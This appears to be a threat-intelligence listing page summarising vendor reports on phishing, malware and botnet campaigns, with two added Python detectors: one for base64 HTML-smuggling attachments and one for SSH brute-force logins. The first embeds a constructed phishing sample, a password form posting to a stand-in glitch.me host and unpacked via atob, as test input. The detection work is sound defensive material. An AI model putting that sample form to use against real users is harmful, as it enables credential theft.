Insikt Group tracks BlueCharlie, a Russia-nexus threat group that’s evolving operations, with 94 new domains since March 2023.
Tag: THREAT INTELLIGENCE
Three crimeware families—DarkGate, LokiBot, and Emotet—are described with their infection chains and capabilities, including a four-stage DarkGate loader, a LokiBot phishing campaign, and an Emotet resurgence via OneNote attachments. The report highlights memo…
Microsoft Threat Intelligence has identified highly targeted social engineering attacks using credential theft phishing lures sent as Microsoft Teams chats by the threat actor that Microsoft tracks as Midnight Blizzard (previously tracked as NOBELIUM). This la…
For the past few years, hackers have increasingly targeted customers and businesses with tainted software boosted via ads. The recipe is simple – cyber-criminal groups set up fake websites for high-interest software and promote them on top of the results page through advertisements. It takes just one search and one click for a user to fall victim to the trick. Testament to that is the series of attacks against prominent crypto-currency figures earlier in 2023 as well as a recent spate of incid
Microsoft details cloud cryptojacking as cloud compute resource abuse within compromised tenants, leading to substantial compute fees (over $300,000 observed). The post outlines attacker lifecycle, GPU-focused deployment, and defender strategies using Microsof…
Vade’s Threat Intelligence and Response Center (TIRC) detected a new Microsoft 365 phishing campaign delivered via a malicious HTML attachment that loads a fake authentication form hosted on glitch.me. The operation uses base64-encoded payloads, JavaScript in …
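The pattern summarised above, a base64-encoded payload inside an HTML attachment that unpacks into a fake sign-in form, can be triaged statically before the attachment ever reaches a browser. The following Python is an added example written for this listing, not code from Vade or from the campaign's kit. It assumes the indicators named in the summary (a base64 blob, JavaScript that unpacks it, a form hosted on glitch.me); the sample attachment, the `example-login.glitch.me` subdomain and the `triage_attachment` function are constructed for the example.

```python
"""Static triage of an HTML e-mail attachment for the HTML-smuggling pattern:
a base64 blob that the page decodes in the browser into a credential form.
Added example; the sample below is constructed, not a captured lure."""
import base64
import re

# Hosts a Microsoft 365 sign-in page has no business contacting. Assumption for
# this example; a real deployment would allow-list the tenant's own login
# endpoints and flag every other host instead.
SUSPICIOUS_HOST_SUFFIXES = ("glitch.me",)

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # long base64-looking runs
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")           # hostname of each URL
PASSWORD_FIELD_RE = re.compile(r"type\s*=\s*[\"']?password", re.I)
DECODER_RE = re.compile(r"atob\s*\(|document\.write\s*\(")  # in-browser unpacking


def decode_base64_blobs(text: str) -> list[str]:
    """Return each long base64 run in text that decodes to valid UTF-8."""
    decoded = []
    for match in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            decoded.append(raw.decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 after all, or binary: ignore
    return decoded


def triage_attachment(html: str) -> dict:
    """Unpack up to two base64 layers and report the phishing indicators found."""
    layers = [html]
    first = decode_base64_blobs(html)
    layers.extend(first)
    for blob in first:                       # allow one more level of nesting
        layers.extend(decode_base64_blobs(blob))

    remote_hosts = set()
    password_form = False
    for layer in layers:                     # visible page plus everything hidden
        remote_hosts.update(h for h in URL_RE.findall(layer)
                            if h.endswith(SUSPICIOUS_HOST_SUFFIXES))
        password_form = password_form or bool(PASSWORD_FIELD_RE.search(layer))

    uses_decoder = bool(DECODER_RE.search(html))
    smuggled = len(layers) > 1 and uses_decoder
    suspicious = (smuggled and (password_form or remote_hosts)) or \
                 (password_form and bool(remote_hosts))
    return {
        "decoded_blobs": len(layers) - 1,
        "uses_decoder": uses_decoder,
        "password_form": password_form,
        "remote_hosts": sorted(remote_hosts),
        "verdict": "suspicious" if suspicious else "clean",
    }


# Constructed sample (not a real capture): an inner sign-in form posting to a
# glitch.me host, base64-encoded and unpacked by the outer page at load time.
_INNER = ('<form method="post" action="https://example-login.glitch.me/submit">'
          '<input name="login" type="email">'
          '<input name="passwd" type="password"></form>')
SAMPLE_ATTACHMENT = (
    '<html><body><script>var p = "'
    + base64.b64encode(_INNER.encode()).decode()
    + '";document.write(atob(p));</script></body></html>'
)
BENIGN_ATTACHMENT = "<html><body><p>Your invoice is attached as a PDF.</p></body></html>"

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_ATTACHMENT))
    print(triage_attachment(BENIGN_ATTACHMENT))
```

The check deliberately scans the decoded layers as well as the visible page: the outer HTML of such a lure is usually innocuous, and the form action and password field only appear after decoding. Only text that decodes to UTF-8 is inspected, so embedded images and other binary base64 are skipped rather than misreported.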
Wordfence Threat Intelligence tracked a targeted exploit campaign against WooCommerce Payments CVE-2023-28121, which allowed unauthenticated attackers to obtain administrative privileges on vulnerable sites. The attackers used a multi-stage workflow including …
Cadet Blizzard is a distinct Russian GRU-sponsored threat actor elevated from DEV-0586, known for destructive and disruptive operations in Ukraine and Europe, including web defacements, WhisperGate, and a hack-and-leak front called Free Civilian. Microsoft Thr…
Microsoft Threat Intelligence ties a destructive operation to MERCURY (also known as Mango Sandstorm) and to DEV-1084 (Storm-1084), detailing how they compromised hybrid on-premises and cloud environments and pursued irreversible disruption rather than ransom.…
Microsoft Threat Intelligence tracks DEV-1101 (now Storm-1101) for developing and promoting an open-source AiTM phishing kit that enables high-volume campaigns and MFA bypass via reverse-proxy session hijacking. The post details the tool, its campaign workflow…
Brute Ratel, a Red Team framework, has been abused by attackers including APT29 to conduct cyber intrusions, with methods such as ISO-delivered LNK files used for DLL sideloading of version.dll. The article also details the framework’s technical underpinnings,…
HUMAN’s Satori Threat Intelligence and Research Team dismantled a sophisticated malvertising operation named VASTFLUX that injected JavaScript into ad creatives to stack multiple video players behind a single banner and fraudulently register views. The operati…
Wordfence Threat Intelligence tracked a critical Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards Premium (versions
Cyble researchers examined a fraud operation where impostors posing as Village Level Entrepreneurs duped CSC Bank Mitra subscribers through a counterfeit CSC registration portal and staged KYC-like interactions. The scheme leveraged fake website ecscgov.co.in,…
MCCrash is a cross‑platform DDoS botnet tracked by Microsoft Threat Intelligence that targets Windows, Linux, and IoT devices to attack private Minecraft servers. It propagates via SSH credential brute‑forcing, downloads multi‑stage components, and issues Mine…
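Because MCCrash spreads by brute-forcing SSH credentials, the host-side indicator is a burst of failed sshd logins from one source followed by an accepted password login. The detector below is an added example written for this listing, not Microsoft's code or anything from the botnet; it assumes OpenSSH's standard auth-log wording, and the log lines, the `detect_ssh_bruteforce` function, the threshold and the window are constructed for the example (the addresses are documentation ranges).

```python
"""Flag SSH password brute-forcing, and a successful login that follows it,
from sshd auth-log lines. Added example; the sample log is constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines (syslog host field omitted). 203.0.113.7 sprays
# passwords and then gets in as root; 198.51.100.9 is a user who mistyped once.
SAMPLE_AUTH_LOG = """\
Mar 14 02:11:07 sshd[4021]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar 14 02:11:09 sshd[4021]: Failed password for invalid user pi from 203.0.113.7 port 51030 ssh2
Mar 14 02:11:11 sshd[4021]: Failed password for root from 203.0.113.7 port 51041 ssh2
Mar 14 02:11:13 sshd[4021]: Failed password for root from 203.0.113.7 port 51055 ssh2
Mar 14 02:11:15 sshd[4021]: Failed password for root from 203.0.113.7 port 51062 ssh2
Mar 14 02:11:18 sshd[4021]: Accepted password for root from 203.0.113.7 port 51070 ssh2
Mar 14 02:20:44 sshd[4099]: Failed password for alice from 198.51.100.9 port 40001 ssh2
Mar 14 02:20:51 sshd[4099]: Accepted publickey for alice from 198.51.100.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*?sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_ts(ts: str) -> datetime:
    """Syslog timestamps carry no year; only differences are used here."""
    return datetime.strptime(ts, "%b %d %H:%M:%S")


def detect_ssh_bruteforce(log: str, threshold: int = 5, window_s: int = 60) -> list[dict]:
    """Return one alert per source that reaches `threshold` failures inside
    `window_s` seconds, plus an alert for any accepted login from such a source."""
    failures = defaultdict(list)        # source ip -> recent failure timestamps
    flagged = set()                     # sources already reported as brute-forcing
    alerts = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                    # not an authentication result line
        ts, ip = parse_ts(m["ts"]), m["ip"]
        # Keep only failures that fall inside the sliding window.
        recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_s]
        if m["result"] == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"kind": "bruteforce", "ip": ip,
                               "failures": len(recent), "at": m["ts"]})
        elif len(recent) >= threshold:
            # A password spray that ends in "Accepted" is the compromise signal.
            alerts.append({"kind": "success_after_bruteforce", "ip": ip,
                           "user": m["user"], "method": m["method"], "at": m["ts"]})
        failures[ip] = recent
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The second alert kind is the one worth paging on: a burst of failures alone is background noise on any Internet-facing SSH port, while an accepted password login from the same source inside the window means the spray worked and the host should be treated as compromised. Devices that cannot take a public-key-only policy are exactly the IoT population the summary describes, so the threshold should be tuned per host class rather than globally.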